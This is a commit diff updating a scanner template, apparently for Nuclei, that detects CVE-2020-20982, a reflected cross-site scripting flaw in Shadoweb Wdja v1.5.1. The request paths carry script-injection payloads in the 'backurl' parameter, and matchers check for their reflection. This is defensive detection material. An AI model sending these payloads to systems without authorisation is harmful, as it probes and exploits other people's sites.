Update CVE-2020-20982.yaml

patch-1
Prince Chaddha 2021-11-23 07:57:11 +04:00 committed by GitHub
parent 8463cfd824
commit 1c569d76cb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -4,23 +4,23 @@ info:
name: Shadoweb Wdja v1.5.1 xss
author: pikpikcu
severity: medium
tags: cve,cve2020,xss,wdja
reference:
- https://github.com/shadoweb/wdja/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-20982
tags: cve,cve2020,xss,wdja,shadoweb
requests:
- method: GET
path:
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- 'alert(document.domain);//'
- '</script><script>alert(document.domain)</script>'
- type: word
part: header